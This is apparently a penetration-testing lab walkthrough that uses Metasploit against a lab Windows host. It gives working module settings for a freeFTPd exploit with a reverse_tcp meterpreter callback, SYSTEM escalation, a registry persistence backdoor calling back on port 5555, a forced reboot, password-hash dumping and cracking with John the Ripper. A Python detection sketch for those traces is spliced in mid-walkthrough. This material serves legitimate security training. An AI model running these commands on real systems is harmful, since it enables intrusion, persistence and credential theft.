Metasploit


In this lab, you will have to use Metasploit and meterpreter against a real machine; this will help you become familiar with the Metasploit framework and its features.

Goal

The goals of the lab are to:

  • Identify the target machine on the network

  • Find a vulnerable service

  • Exploit the service by using Metasploit to get a meterpreter session

  • Gather information from the machine by using meterpreter commands

  • Retrieve the password hashes from the exploited machine

  • Search for a file named "Congrats.txt"

Tools

The best tools for this lab are:

  • Nmap

  • Metasploit (Metasploit 5 is recommended)

  • John the Ripper

Steps

Find a target in the network

Since we do not have any information about the remote network and the hosts attached to it, the first step is to find a possible target!

Identify available services on the target

Now that we know there is a host on the target network, scan the host and gather as much information as possible.

Find a vulnerable service in Metasploit

You should have identified a few services running on the machine. Check whether Metasploit contains a working exploit for those specific services and versions.

Configure the module and exploit the machine

Select the Metasploit module found in the previous step and configure it with the correct parameters. Once you have the module set, launch the exploit! You should get a meterpreter session!

Obtain SYSTEM privileges on the machine

The most important step once you have exploited a machine is to obtain the highest privileges you can. This will allow you to access much more information and run many more commands. Try to obtain SYSTEM privileges on the machine!

Install a backdoor

Now that you have full privileges on the machine, install a backdoor on it.

If you want to test whether the backdoor works, just run "reboot" in the meterpreter session and wait a minute. Once the machine comes back up, you should be able to use your backdoor!

Get the password hashes and crack them

It is now time to gather some data! Dump all the password hashes of the exploited machine!

Once you have them, you can also try to crack the passwords with John the Ripper.

Gather information

Try to gather as much information as possible from the target machine: applications, routes, interfaces and so on. Explore the machine and the Metasploit module to practice with different tools and output.

Locate and download the congrats.txt file

Browse the target machine, find the file named "Congrats.txt" and download it to your machine!

SOLUTIONS

Below, you will find solutions for every task of this lab. Please go ahead ONLY if you have COMPLETED the lab or you are stuck. Checking the solutions before actually trying the concepts and techniques you studied in the course will dramatically reduce the benefits of the hands-on lab!

Solutions steps

Find a target in the network

We first need to determine which network the remote hosts are on. We can do so by running ifconfig and checking the IP address of our tap0 interface.

As we can see, the target network is 192.168.99.0/24.

Let's run nmap -sn to discover the available hosts on the network:

The above screenshot shows that the only host alive in the network is 192.168.99.12 (besides our host: 192.168.99.100).

Identify available services on the target

Run a service detection scan and verify which services are listening on the remote host:

As we can see in the previous output, there are a few services enabled.

Let's focus our tests on FreeFTPd.

Find a vulnerable service in Metasploit

Run a search in the Metasploit database and see if there are any modules related to the freeFTPd service:

msf5> search freeftp

Reviewing the output in the above screenshot, we can see that there are a few modules we can use. Let's select the first in the list, as it is the most recently discovered one and also the most reliable.

Configure the module and exploit the machine

First, select the module and configure its options as follows:

use exploit/windows/ftp/freeftpd_pass
set ftpuser anonymous
set rhosts 192.168.99.12
set rport 21
set payload windows/meterpreter/reverse_tcp
set exitfunc process
set lhost 192.168.99.100
set lport 4444

The previous screenshot shows the module configured and ready to run. We just had to select the RHOST and set the payload options.

Now we can start the module by typing exploit:

As we can see, we have successfully exploited the service! A meterpreter session is opened, and our prompt changes!

Obtain SYSTEM privileges on the machine

As you already know, meterpreter offers a lot of commands and functionalities.

In order to escalate privileges on Windows machines we just have to type getsystem and hit enter:

In the above screenshot, you can see how we successfully escalated the privileges (from ftp user to system).

Install a backdoor

There are many modules and commands that we can use to install a backdoor on the target machine automatically.

In this lab, we are going to use the persistence module as follows.

By pressing Ctrl + z inside the meterpreter prompt, we can put it into the background and work further on the backdoor:

One additional thing we must do is check the session number.

Type "sessions -l" inside the Metasploit prompt and keep in mind the Id value:

Now, let's go to the persistence module, as follows:

Let's configure it.

The session should be set to the value obtained above.

use exploit/windows/local/persistence
set reg_name backdoor
set exe_name backdoor
set startup SYSTEM
set session 1
set payload windows/meterpreter/reverse_tcp
set exitfunc process
set lhost 192.168.99.100
set lport 5555
set DisablePayloadHandler false
exploit

If the backdoor does not start immediately, use "exploit -j" instead.

Note that we will also need to enable the Payload Handler in order to receive the connection, as follows:

As we can see in the screenshot, we set the STARTUP parameter to SYSTEM (since we have SYSTEM privileges on the machine) and also set the name of the Windows registry key to "backdoor".

Moreover, if you check the payload options, we set the backdoor to connect on our local IP address on port 5555.

Let's try to run it!

Depending on your version of Kali and Metasploit you might receive the shell immediately or not.

Older versions of Metasploit / Kali may establish a new session immediately, while Kali 2019+ / Metasploit 5 may require a reboot.

If your output looks like the one below and your meterpreter shell on port 5555 did not pop up, you need to proceed further:

As you can see, the backdoor has been successfully installed, but so far it has only been planted in the registry's autorun area of the target system. To run the backdoor, we need to perform a system reboot (a user switching their machine off and on would eventually cause the backdoor to run as well). Let's go back to our meterpreter session and spawn a shell to reboot the victim system:

sessions -i 1
shell
shutdown /r /f

You will know that the reboot occurred when your meterpreter session dies after a minute or two:

Let's go back to the shell.

When in shell, press Ctrl+Z twice to return to the main Metasploit menu. Type "jobs -l" to see if any active listeners are running:

It seems that we are currently unable to receive any backdoor connection since there are no working listeners.

In this case, let's create a Metasploit listener to receive the connection. The payload has to be of the same type as the backdoor that was placed on the victim system:

use exploit/multi/handler
set lhost 192.168.99.100
set lport 5555
set payload windows/meterpreter/reverse_tcp
exploit -j

Now, press ENTER. You should now be able to interact with your backdoor session:
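From the defender's side, the persistence module and handler configured above leave two observable traces: a Run-key value named after reg_name ("backdoor") that launches at boot, and an outbound reverse_tcp connection to lhost:lport once the machine comes back. The following Python is an added example, not part of this lab or of Metasploit, that applies those two detection rules to constructed Sysmon-style events; the field names and the temp-directory launcher path are assumptions.

```python
import re

TEMP_DIRS = re.compile(r"\\(temp|tmp|appdata\\local\\temp)\\", re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe")
LAB_LISTENER_PORTS = {4444, 5555}  # the lport values from this lab's own configuration

# Constructed Sysmon-style events (field names are assumptions). Events 0 and 2 mimic the
# autorun value named "backdoor" and the reverse_tcp callback to lhost:5555 after reboot.
SAMPLE_EVENTS = [
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backdoor",
     "Details": r"C:\WINDOWS\TEMP\launcher.vbs"},  # launcher path is an assumption
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r"C:\Program Files\Vendor\tray.exe /silent"},
    {"EventID": 3, "Image": r"C:\WINDOWS\system32\wscript.exe",
     "DestinationIp": "192.168.99.100", "DestinationPort": 5555},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
]

def suspicious_autorun(ev):
    """Sysmon ID 13: a Run/RunOnce value launching from a temp dir or via a script host."""
    if ev.get("EventID") != 13:
        return None
    key, data = ev.get("TargetObject", ""), ev.get("Details", "")
    if not re.search(r"\\CurrentVersion\\Run(Once)?\\", key, re.IGNORECASE):
        return None
    name = key.rsplit("\\", 1)[-1]  # the value name, i.e. reg_name in the module above
    if TEMP_DIRS.search(data):
        return f"Run-key value '{name}' launches from a temp directory"
    if data.lower().endswith(".vbs") or any(h in data.lower() for h in SCRIPT_HOSTS):
        return f"Run-key value '{name}' launches a script host"
    return None

def suspicious_connection(ev):
    """Sysmon ID 3: any process dialling a lab listener port, or a script host dialling out."""
    if ev.get("EventID") != 3:
        return None
    exe = ev.get("Image", "").lower().rsplit("\\", 1)[-1]
    port = int(ev.get("DestinationPort", 0))
    if port in LAB_LISTENER_PORTS:
        return f"{exe} connected to listener port {port}"
    if exe in SCRIPT_HOSTS:
        return f"script host {exe} made an outbound connection"
    return None

def triage(events):
    """Return (index, reason) for every event a rule fires on; benign events are skipped."""
    return [(i, r) for i, ev in enumerate(events)
            if (r := suspicious_autorun(ev) or suspicious_connection(ev))]
```

Run over SAMPLE_EVENTS, triage flags only the "backdoor" Run-key value and the wscript.exe connection to port 5555; the vendor autorun entry and the browser's HTTPS traffic pass.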

Get the password hashes and crack them

Let's now escalate to SYSTEM once again and then try to dump the password hashes from the victim machine, as follows:

Once we have the hashes, we can store them locally in a file and use John the Ripper to crack them.

Gather information

In this task, you can use every command or module you want to gather information from the remote machine; this will help you to better understand how to use Metasploit and its features.

Locate and download the congrats.txt file

In order to locate and download the Congrats.txt file we can simply run the following commands:

search -f congrats.txt
download 'c:\Documents and Settings\eLSAdmin\My Documents\Congrats.txt' /root/
# or
download 'c:\\Documents and Settings\eLSAdmin\My Documents\Congrats.txt' /root/

Now, we just need to open it:
